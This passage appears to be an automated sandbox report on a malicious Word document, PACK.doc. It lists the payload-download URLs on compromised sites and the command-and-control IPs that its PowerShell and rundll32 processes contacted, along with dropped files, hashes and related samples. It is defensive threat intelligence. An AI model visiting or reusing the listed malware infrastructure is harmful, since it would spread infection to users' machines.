                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/100%Avira URL Cloudmalware
                      http://givingthanksdaily.com/qlE/VeF/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      petafilm.com
                      		176.53.69.151
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://petafilm.com/wp-admin/4m/true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmpfalse
                        		high
                        http://www.windows.com/pctv.rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpfalse
                          		high
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpfalse
                              		high
                              http://petafilm.compowershell.exe, 00000005.00000002.2102091328.0000000003A04000.00000004.00000001.sdmptrue
                              • 6%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2097126955.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102087996.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102601330.0000000002870000.00000002.00000001.sdmp, rundll32.exe, 00000011.00000002.2121847060.0000000002790000.00000002.00000001.sdmpfalse
                                		high
                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmpfalse
                                  		high
                                  http://zieflix.teleskopstore.com/cgi-bin/Gt3S/powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmptrue
                                  • 5%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.piriform.com/cc=powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmpfalse
                                    		high
                                    https://somanap.com/wp-admin/P/powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://investor.msn.com/rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpfalse
                                      		high
                                      https://fnjbq.com/wp-includes/rlR/powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://wap.zhonglisc.com/wp-includes/QryCB/powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmpfalse
                                        		high
                                        http://www.%s.comPApowershell.exe, 00000005.00000002.2097126955.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102087996.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102601330.0000000002870000.00000002.00000001.sdmp, rundll32.exe, 00000011.00000002.2121847060.0000000002790000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		low
                                        http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2105756347.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100816040.0000000001E17000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpfalse
                                          		high
                                          https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://givingthanksdaily.com/qlE/VeF/powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          176.53.69.151
                                          		unknownTurkey
                                          		42926RADORETRtrue
                                          5.2.136.90
                                          		unknownRomania
                                          		8708RCS-RDS73-75DrStaicoviciROtrue

                                          General Information

                                          Joe Sandbox Version:31.0.0 Red Diamond
                                          Analysis ID:336504
                                          Start date:06.01.2021
                                          Start time:08:56:44
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 12m 41s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:PACK.doc
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:23
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • GSI enabled (VBA)
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winDOC@38/8@1/2
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 94.1% (good quality ratio 90.5%)
                                          • Quality average: 74.7%
                                          • Quality standard deviation: 25.3%
                                          HCA Information:
                                          • Successful, ratio: 95%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .doc
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Found warning dialog
                                          • Click Ok
                                          • Attach to Office via COM
                                          • Scroll down
                                          • Close Viewer
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                          • TCP Packets have been reduced to 100
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          08:57:42API Interceptor1x Sleep call for process: msg.exe modified
                                          08:57:43API Interceptor21x Sleep call for process: powershell.exe modified
                                          08:57:45API Interceptor960x Sleep call for process: rundll32.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          176.53.69.151bestand-8881014518 00944.docGet hashmaliciousBrowse
                                          • petafilm.com/wp-admin/4m/
                                          pack 2254794.docGet hashmaliciousBrowse
                                          • petafilm.com/wp-admin/4m/
                                          informazioni-0501-012021.docGet hashmaliciousBrowse
                                          • petafilm.com/wp-admin/4m/
                                          rapport 40329241.docGet hashmaliciousBrowse
                                          • petafilm.com/wp-admin/4m/
                                          Dati_012021_688_89301.docGet hashmaliciousBrowse
                                          • petafilm.com/wp-admin/4m/
                                          2199212_20210105_160680.docGet hashmaliciousBrowse
                                          • petafilm.com/wp-admin/4m/
                                          ARCHIVO_FILE.docGet hashmaliciousBrowse
                                          • petafilm.com/wp-admin/4m/
                                          doc_X_13536.docGet hashmaliciousBrowse
                                          • petafilm.com/wp-admin/4m/
                                          ytgeKMQNL2.docGet hashmaliciousBrowse
                                          • petafilm.com/wp-admin/4m/
                                          5.2.136.90pack 2254794.docGet hashmaliciousBrowse
                                          • 5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/
                                          DATA-480841.docGet hashmaliciousBrowse
                                          • 5.2.136.90/6tycsc/
                                          Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                          • 5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/
                                          pack-91089 416755919.docGet hashmaliciousBrowse
                                          • 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/
                                          Adjunto.docGet hashmaliciousBrowse
                                          • 5.2.136.90/nmjn7tw17/z6mjkdfb6xb/85tf0qh6u/bqo6i0tmr9bo/
                                          arc-NZY886292.docGet hashmaliciousBrowse
                                          • 5.2.136.90/zpm1364ks766bq5tfgm/of4c87wiptl9gmt2iai/xi3tkrikfkjmyw07j7s/8758g9rolh/96kjwl7hgnpltacdm2/gdi8d56ispt49sa36ql/
                                          NQN0244_012021.docGet hashmaliciousBrowse
                                          • 5.2.136.90/xgyqftp8/ypox5kzx24gfln5utkh/ejrffzc54r5vq/itkmc/prx4/
                                          4560 2021 UE_9893.docGet hashmaliciousBrowse
                                          • 5.2.136.90/tqndp5p5qacps4njp6/p6z0bktcdw7ja/i1rph/
                                          Scan-0767672.docGet hashmaliciousBrowse
                                          • 5.2.136.90/7hs0yieqcvglex40v9/th111ygicc1htiecx/eto0vvprampeftpmcc/
                                          Documento-2021.docGet hashmaliciousBrowse
                                          • 5.2.136.90/n5z35/rncfyghpt3nn9/twyyh8xn/dm5hb/
                                          informazioni-0501-012021.docGet hashmaliciousBrowse
                                          • 5.2.136.90/kcdo20u2bqptv6/
                                          rapport 40329241.docGet hashmaliciousBrowse
                                          • 5.2.136.90/6s0p53atjr9ihwygvd/svxo4o84aueyhj9v5m/5lqp30jb/g0ur1kwrzvgj3o0gmmo/dw8my2m1fzzo/
                                          info_39534.docGet hashmaliciousBrowse
                                          • 5.2.136.90/5ciqo/dhqbj3xw/
                                          Dati_012021_688_89301.docGet hashmaliciousBrowse
                                          • 5.2.136.90/l7tybna/g7nyjudv6/gf8bykzqxpzupj/wr2o0u8id88pf7dgmx3/9zupu1q7mb/wtjo6ov5niso7jo0n/
                                          2199212_20210105_160680.docGet hashmaliciousBrowse
                                          • 5.2.136.90/vcpu82n/rvhhoco3em4jtl/qxey084opeuhirghxzs/bm8x5w07go1ogzflbv/32imx8ryeb30/bd7tg46kn/
                                          ARCHIVO_FILE.docGet hashmaliciousBrowse
                                          • 5.2.136.90/ji02pdi/39rfb96opn/
                                          doc_X_13536.docGet hashmaliciousBrowse
                                          • 5.2.136.90/glhz448zi9act/ieva/q040/sl9198fns4q2/
                                          REP380501 040121.docGet hashmaliciousBrowse
                                          • 5.2.136.90/09hsu3aavqd4/8opns7c/oxp5fp7awb/
                                          doc-20210104-0184.docGet hashmaliciousBrowse
                                          • 5.2.136.90/78ro59myn48w9a6ku/bcgjwwwuc/
                                          7823099012021.docGet hashmaliciousBrowse
                                          • 5.2.136.90/bl7bvpp8itof0dvu5j2/nwcw9ztkp/yjrulniti57vcwwk67t/6u49kr6/

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          petafilm.combestand-8881014518 00944.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          pack 2254794.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          informazioni-0501-012021.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          rapport 40329241.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          Dati_012021_688_89301.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          2199212_20210105_160680.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          ARCHIVO_FILE.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          doc_X_13536.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          ytgeKMQNL2.docGet hashmaliciousBrowse
                                          • 176.53.69.151

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          RCS-RDS73-75DrStaicoviciROpack 2254794.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          DATA-480841.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          pack-91089 416755919.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          Adjunto.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          arc-NZY886292.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          NQN0244_012021.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          4560 2021 UE_9893.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          Scan-0767672.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          Documento-2021.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          informazioni-0501-012021.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          rapport 40329241.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          info_39534.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          Dati_012021_688_89301.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          2199212_20210105_160680.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          ARCHIVO_FILE.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          doc_X_13536.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          REP380501 040121.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          doc-20210104-0184.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          7823099012021.docGet hashmaliciousBrowse
                                          • 5.2.136.90
                                          RADORETRbestand-8881014518 00944.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          pack 2254794.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.docGet hashmaliciousBrowse
                                          • 185.225.36.38
                                          informazioni-0501-012021.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                                          • 185.225.36.38
                                          PSX7103491.docGet hashmaliciousBrowse
                                          • 185.225.36.38
                                          Beauftragung.docGet hashmaliciousBrowse
                                          • 185.225.36.38
                                          rapport 40329241.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          Dati_012021_688_89301.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          2199212_20210105_160680.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                                          • 185.225.36.38
                                          ARCHIVO_FILE.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          doc_X_13536.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          ytgeKMQNL2.docGet hashmaliciousBrowse
                                          • 176.53.69.151
                                          vrhiyc.exeGet hashmaliciousBrowse
                                          • 46.45.148.196
                                          ucrcdh.exeGet hashmaliciousBrowse
                                          • 46.45.148.196
                                          lrbwh.exeGet hashmaliciousBrowse
                                          • 46.45.148.196
                                          ECS9522020111219400053_19280.exeGet hashmaliciousBrowse
                                          • 46.235.9.150
                                          BdBdbczoqd.exeGet hashmaliciousBrowse
                                          • 185.84.181.88
                                          N89uC6re8k.exeGet hashmaliciousBrowse
                                          • 185.84.181.89

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dllbestand-8881014518 00944.docGet hashmaliciousBrowse

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E1AD59AA-72A2-4470-89E8-B7D87A58E0E0}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):46
                                            Entropy (8bit):1.0424600748477153
                                            Encrypted:false
                                            SSDEEP:3:/lbWwWl:sZ
                                            MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                            SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                            SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                            SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                            Malicious:false
                                            Preview: ........................................user.
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PACK.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Wed Jan 6 15:57:39 2021, length=173056, window=hide
                                            Category:dropped
                                            Size (bytes):1960
                                            Entropy (8bit):4.495607664035489
                                            Encrypted:false
                                            SSDEEP:48:84/XTFGqGqVY/roQh24/XTFGqGqVY/roQ/:84/XJGqGqy/roQh24/XJGqGqy/roQ/
                                            MD5:2D2A6D8C00D1CB6D276F088C4124950C
                                            SHA1:B13063D206F4E4D4F19789D2927E65A1A9CB3B9E
                                            SHA-256:DB5CF6C4209C2A1B72348015674F8B6C69699776BA22E4F358C19D4812BB8135
                                            SHA-512:3A3CFD5B5635D73AFBE5BD5F477CA8A194FBED94C7BC6081AAD6132346516221AE2D36E45FBB662F92E761C35847AADB8C4C0BCF3F9DC6B7550930921DA3796B
                                            Malicious:false
                                            Preview: L..................F.... .....2..{....2..{.._Dd.M................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....V.2.....&R4. .PACK.doc..>.......Q.y.Q.y*...8.....................P.A.C.K...d.o.c.......r...............-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop\PACK.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.A.C.K...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......715575..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..................F
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):50
                                            Entropy (8bit):3.908493070364557
                                            Encrypted:false
                                            SSDEEP:3:M1umEFSt2LFSmX1umEFSv:Msm52WmT
                                            MD5:127D6DD53F384B77260068267C530A20
                                            SHA1:86CFA18B82407790368C214C0F5D80E83E6D3EDA
                                            SHA-256:96B1EA781C03A4DFD83AA8D2507B7C9AB4E8D0FFDB5D05F0FB69BCC6CAD388FB
                                            SHA-512:53164C1B5EB88659AD960E5DEA1E6AF04C3E16FB05DC8016F255A222D95FB87ECB746BF7C4150A762319C32F30B88530606876DB527F23B8BEC666560F9BDF42
                                            Malicious:false
                                            Preview: [doc]..PACK.LNK=0..PACK.LNK=0..[doc]..PACK.LNK=0..
                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                            MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                            SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                            SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                            SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JRJ1D8NWH1YIJYW9A2NJ.temp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.5897916404018257
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqUqvsqvJCwo6z8hQCsMqUqvsEHyqvJCworIz2YYxHBf8HdlUVkIu:cydo6z8yFHnorIz2Xf8HpIu
                                            MD5:D3E84FCC21BB8F4F71EFA66C1EC1EEF3
                                            SHA1:64984C8EE50A840C188A71014F5EFFAA76EE8B25
                                            SHA-256:ADE4450E0AC3D6CB3364B709A4038EB5F52F1D7C1F472CF800501670A8E38CF9
                                            SHA-512:AB4F7ED17EB7729E5C2684CB53D984A4CE774A9F2034F9F2AD0FD8290B3E13F66F226DF50FFF68F909F45C69B6E6910F593B512FC1FE0F148FD9A6885EC5D6C5
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):192000
                                            Entropy (8bit):7.470368045221206
                                            Encrypted:false
                                            SSDEEP:3072:SwbpDnn9F4rNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:Ssl9F8aBYF0nVp2MJHybR8dS9
                                            MD5:009380116F3429BA6F236D199F418B98
                                            SHA1:292360D762524AD98FADDB735BB58AB3DABA5327
                                            SHA-256:323F6431FB274E90DC003E567C54CB5E2327E9408F903E49CC6F3E840BF9BCF6
                                            SHA-512:5D086691A8109091C847B690E905D0BDEACE03E0A295F120F0231B4A7ADC3EC45A77FF626DD9EA792BBD32EA02909CAC2EBF255D7155011244978927F4E1645C
                                            Malicious:true
                                            Joe Sandbox View:
                                            • Filename: bestand-8881014518 00944.doc, Detection: malicious, Browse
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..wT..wT..wT......wT.....wT......wT.-....wT.-....wT..wU.SwT.-....wT......wT......wT......wT..w...wT......wT.Rich.wT.........PE..L......_...........!.........J.......E.......................................0.......................................................P.. ...............................8...............................@............................................text............................... ..`.rdata...J.......L..................@..@.data....-... ......................@....rsrc... ....P......................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\Desktop\~$PACK.doc
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                            MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                            SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                            SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                            SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                            Malicious:true
                                            Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: National JSON parsing Checking Account overriding metrics Shoes Handcrafted Rubber Chair cross-media, Author: Laura David, Template: Normal.dotm, Last Saved By: Lisa Moulin, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 06:14:00 2021, Last Saved Time/Date: Tue Jan 5 06:14:00 2021, Number of Pages: 1, Number of Words: 3222, Number of Characters: 18371, Security: 8
                                            Entropy (8bit):6.6852671101832435
                                            TrID:
                                            • Microsoft Word document (32009/1) 79.99%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                            File name:PACK.doc
                                            File size:172473
                                            MD5:d114fc2644da49f16a6be05bb0db6b08
                                            SHA1:6b5b6a9a5291b1b564ad3005c392ff1756ceef9e
                                            SHA256:d9687c1ca0f341d62cf664cdfe3c9741f1f48df25129df53df9ae81979e89a5d
                                            SHA512:2459b91d0252980b7404b7868c5f8435039bdc6edd922ca70c6e98f6bdd2cceae48e09df7cd5428b96329f3c42225abe74e2752575f91da3a22e42bdcc13d564
                                            SSDEEP:3072:59ufstRUUKSns8T00JSHUgteMJ8qMD7glCeISWp0bl:59ufsfgIf0pLl7I/Ql
                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4eea2aaa4b4b4a4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "PACK.doc"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Office Word
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
